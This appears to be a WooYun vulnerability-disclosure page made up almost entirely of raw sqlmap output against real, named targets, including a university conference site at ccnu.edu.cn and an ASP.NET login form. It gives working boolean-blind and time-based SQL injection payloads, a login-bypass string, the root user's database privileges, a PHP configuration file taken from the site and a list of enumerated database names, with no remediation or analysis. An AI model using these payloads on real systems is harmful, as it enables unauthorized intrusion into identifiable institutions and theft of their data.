WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://etif2013.ccnu.edu.cn:80/index.php?s=/ConferenceInfo/conferenceDetail/id/2-(1) AND 8771=8771 AND (6750=6750).shtml
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://etif2013.ccnu.edu.cn:80/index.php?s=/ConferenceInfo/conferenceDetail/id/2-(1) AND SLEEP(10) AND (6668=6668).shtml
---
[01:39:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.6
back-end DBMS: MySQL 5

database management system users roles:
[*] %root% (administrator) [25]:
    role: ALTER
    role: ALTER ROUTINE
    role: CREATE
    role: CREATE ROUTINE
    role: CREATE TEMPORARY TABLES
    role: CREATE USER
    role: CREATE VIEW
    role: DELETE
    role: DROP
    role: EXECUTE
    role: FILE
    role: INDEX
    role: INSERT
    role: LOCK TABLES
    role: PROCESS
    role: REFERENCES
    role: RELOAD
    role: REPLICATION CLIENT
    role: REPLICATION SLAVE
    role: SELECT
    role: SHOW DATABASES
    role: SHOW VIEW
    role: SHUTDOWN
    role: SUPER
    role: UPDATE

<?php
$config1 = array(
    /* 数据库设置 */
    'DB_TYPE' => 'mysql', // 数据库类型
    'SHOW_PAGE_TRACE' => FALSE,
    'TOKEN_ON' => true, // 是否开启令牌验证
    'TOKEN_NAME' => '__hash__', // 令牌验证的表单隐藏字段名称
    'TOKEN_TYPE' => 'md5', //令牌哈希验证规则 默认为MD5
    'TOKEN_RESET' => FALSE, //令牌验证出错后是否重置令牌 默认为true
    /* 开发人员相关信息 */
    'AUTHOR_INFO' => array(
        'author' => '***马赛克***',
        'author_email' => '***马赛克***@qq.com',
    ),
    'DEFAULT_AJAX_RETURN'=>'json',
);
$config2 = WEB_ROOT . "Common/systemConfig.php";
$config2 = file_exists($config2) ? include "$config2" : array();
return array_merge($config1, $config2);
?>

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: _idJsp0:userName
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: _idJsp0:userName='or'a'='a' AND 6607=6607 AND 'VNvy'='VNvy&_idJsp0:pw='or'a'='a&_idJsp0:_idJsp2.x=28&_idJsp0:_idJsp2.y=11&_idJsp0_SUBMIT=1&_idJsp0:_idcl=&_idJsp0:_link_hidden_=&javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAANzcgA6b3JnLmFqYXg0anNmLmFwcGxpY2F0aW9uLkFqYXhTdGF0ZU1hbmFnZXIkVHJlZVN0cnV0dXJlTm9kZYKP75jDZiMJDAAAeHB6AAABnAAjb3JnLmFqYXg0anNmLmNvbXBvbmVudC5BamF4Vmlld1Jvb3QACV92aWV3Um9vdAAAAAAAAAABACNqYXZheC5mYWNlcy5jb21wb25lbnQuaHRtbC5IdG1sRm9ybQAHX2lkSnNwMAAAAAAAAAAFAChqYXZheC5mYWNlcy5jb21wb25lbnQuaHRtbC5IdG1sSW5wdXRUZXh0AAh1c2VyTmFtZQAAAAAAAAAAACpqYXZheC5mYWNlcy5jb21wb25lbnQuaHRtbC5IdG1sSW5wdXRTZWNyZXQAAnB3AAAAAAAAAAAAKWphdmF4LmZhY2VzLmNvbXBvbmVudC5odG1sLkh0bWxPdXRwdXRUZXh0AAdfaWRKc3AxAAAAAAAAAAAALGphdmF4LmZhY2VzLmNvbXBvbmVudC5odG1sLkh0bWxDb21tYW5kQnV0dG9uAAdfaWRKc3AyAAAAAAAAAAAALGphdmF4LmZhY2VzLmNvbXBvbmVudC5odG1sLkh0bWxDb21tYW5kQnV0dG9uAAdfaWRKc3AzAAAAAAAAAAB4dXEAfgAAAAAAAnVxAH4AAAAAAAN1cQB+AAAAAAACdXEAfgAAAAAABXVxAH4AAAAAAAd0AAlfdmlld1Jvb3RwcHEAfgAJc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAADHcIAAAAEAAAAAB4cHBzcgAQamF2YS51dGlsLkxvY2FsZX74EWCcMPnsAgAESQAIaGFzaGNvZGVMAAdjb3VudHJ5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAIbGFuZ3VhZ2VxAH4ADUwAB3ZhcmlhbnRxAH4ADXhw/////3QAAHQAAnpocQB+AA90AApIVE1MX0JBU0lDdAAmL3Jlc291cmNlYWRtaW4vdXNlci9wZ3BfdXNlcl9sb2dpbi5qc3BzcgAOamF2YS5sYW5nLkxvbmc7i+SQzI8j3wIAAUoABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAAAAAAB1cQB+AAAAAAAFc3IAEWphdmEubGFuZy5Cb29sZWFuzSBygNWc+u4CAAFaAAV2YWx1ZXhwAHEAfgAYcHEAfgAYcQB+ABhwc3IAE2phdmEudXRpbC5BcnJheUxpc3R4gdIdmcdhnQMAAUkABHNpemV4cAAAAAF3BAAAAAF1cQB+AAAAAAADdXEAfgAAAAAAFnVxAH4AAAAAAAd0AAdfaWRKc3AwcHQAEGphdmF4LmZhY2VzLkZvcm1xAH4AHnNxAH4ACj9AAAAAAAAMdwgAAAAQAAAAAnQAMmphdmF4LmZhY2VzLndlYmFwcC5VSUNvbXBvbmVudFRhZy5GT1JNRVJfQ0hJTERfSURTc3IAEWphdmEudXRpbC5IYXNoU2V0ukSFlZa4tzQDAAB4cHcMAAAAED9AAAAAAAAFdAAHX2lkSnNwM3QACHVzZXJOYW1ldAAHX2lkSnNwMXQAAnB3dAAHX2lkSnNwMnh0AAxmb3JjZUlkSW5kZXhzcQB+ABcBeHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHNxAH4AGQAAAAV3BAAAAAV1cQB+AAAAAAADdXEAfgAAAAAAG3VxAH4AAAAAAAl1cQB+AAAAAAADdXEAfgAAAAAAB3EAfgAlcHQAEGphdmF4LmZhY2VzLlRleHR0ABBfaWRKc3AwOnVzZXJOYW1lc3EAfgAKP0AAAAAAAAx3CAAAABAAAAABcQB+AClxAH4AKnhwc3EAfgAKP0AAAAAAAAF3CAAAAAIAAAABdAAFdmFsdWVzcgAramF2YXguZmFjZXMuY29tcG9uZW50Ll9BdHRhY2hlZFN0YXRlV3JhcHBlckSr5kB900/EAgACTAAGX2NsYXNzdAARTGphdmEvbGFuZy9DbGFzcztMABNfd3JhcHBlZFN0YXRlT2JqZWN0dAASTGphdmEvbGFuZy9PYmplY3Q7eHB2cgAmb3JnLmFwYWNoZS5teWZhY2VzLmVsLlZhbHVlQmluZGluZ0ltcGwAAAAAAAAAAAAAAHhwdAAcI3tSZXNvdXJjZVVzZXJCZWFuLnVzZXJOYW1lfXhwcHBxAH4AGHBwcQB+ACpwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHEAfgAUAAAAFHB0AAN0eHRwcHBwdXEAfgAAAAAAA3VxAH4AAAAAABx1cQB+AAAAAAAJdXEAfgAAAAAAA3VxAH4AAAAAAAdxAH4AJ3B0ABJqYXZheC5mYWNlcy5TZWNyZXR0AApfaWRKc3AwOnB3c3EAfgAKP0AAAAAAAAx3CAAAABAAAAABcQB+AClxAH4AKnhwc3EAfgAKP0AAAAAAAAF3CAAAAAIAAAABcQB+ADVzcQB+ADZxAH4AO3QAFiN7UmVzb3VyY2VVc2VyQmVhbi5wd314cHBwcQB+ABhwcHEAfgAqcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHNxAH4APQAAABRwcQB+AD9wcHBwdXEAfgAAAAAAA3VxAH4AAAAAAAV1cQB+AAAAAAADdXEAfgAAAAAAB3EAfgAmcHEAfgAxdAAPX2lkSnNwMDpfaWRKc3Axc3EAfgAKP0AAAAAAAAx3CAAAABAAAAABcQB+AClxAH4AKnhwc3EAfgAKP0AAAAAAAAN3CAAAAAQAAAACcQB+ADVzcQB+ADZxAH4AO3QAGCN7UmVzb3VyY2VVc2VyQmVhbi50aXBzfXQACHJlbmRlcmVkc3EAfgA2cQB+ADt0AB4je1Jlc291cmNlVXNlckJlYW4udGlwcyE9bnVsbH14cHBwdAAYZm9udC1zaXplOjE0cHg7Y29sb3I6cmVkcHBwcHVxAH4AAAAAAAN1cQB+AAAAAAAbdXEAfgAAAAAABXVxAH4AAAAAAAdxAH4AKHB0ABJqYXZheC5mYWNlcy5CdXR0b250AA9faWRKc3AwOl9pZEpzcDJzcQB+AAo/QAAAAAAADHcIAAAAEAAAAAFxAH4AKXEAfgAqeHBwc3EAfgA2dnIAJ29yZy5hcGFjaGUubXlmYWNlcy5lbC5NZXRob2RCaW5kaW5nSW1wbAAAAAAAAAAAAAAAeHB1cQB+AAAAAAACdAAbI3tSZXNvdXJjZVVzZXJCZWFuLnRvTG9naW59cHBwcHBwcHB0ABwuLi9pbWFnZXMvbG9naW4vbG9naW5faW4uZ2lmcHBwcHBwcHBwcHBwcHBwcHQADGFsaWduOmNlbnRlcnBwcHBwcHVxAH4AAAAAAAN1cQB+AAAAAAAbdXEAfgAAAAAABXVxAH4AAAAAAAdxAH4AJHBxAH4AXXQAD19pZEpzcDA6X2lkSnNwM3NxAH4ACj9AAAAAAAAMdwgAAAAQAAAAAXEAfgApcQB+ACp4cHBzcQB+ADZxAH4AYnVxAH4AAAAAAAJ0ACIje1Jlc291cmNlVXNlckJlYW4udG9QYWdlUmVnc2l0ZXJ9cHBwcHBwcHB0AB0uLi9pbWFnZXMvbG9naW4vbG9naW5fcmVnLmdpZnBwcHBwcHBwcHBwcHBwcHBxAH4AZnBwcHBwcHh4cHEAfgAS
---

there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: dt, type: Unescaped numeric (default)
[1] place: POST, parameter: name, type: Single quoted string
[2] place: POST, parameter: idn, type: Single quoted string
[3] place: POST, parameter: kno, type: Single quoted string
[q] Quit
> 1
[04:15:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[04:15:37] [INFO] fetching database names
[04:15:37] [INFO] the SQL query used returns 5 entries
[04:15:37] [INFO] retrieved: "CETINFO"
[04:15:37] [INFO] retrieved: "master"
[04:15:37] [INFO] retrieved: "model"
[04:15:37] [INFO] retrieved: "msdb"
[04:15:37] [INFO] retrieved: "tempdb"
available databases [5]:                                                                                                                                                                                   
[*] CETINFO
[*] master
[*] model
[*] msdb
[*] tempdb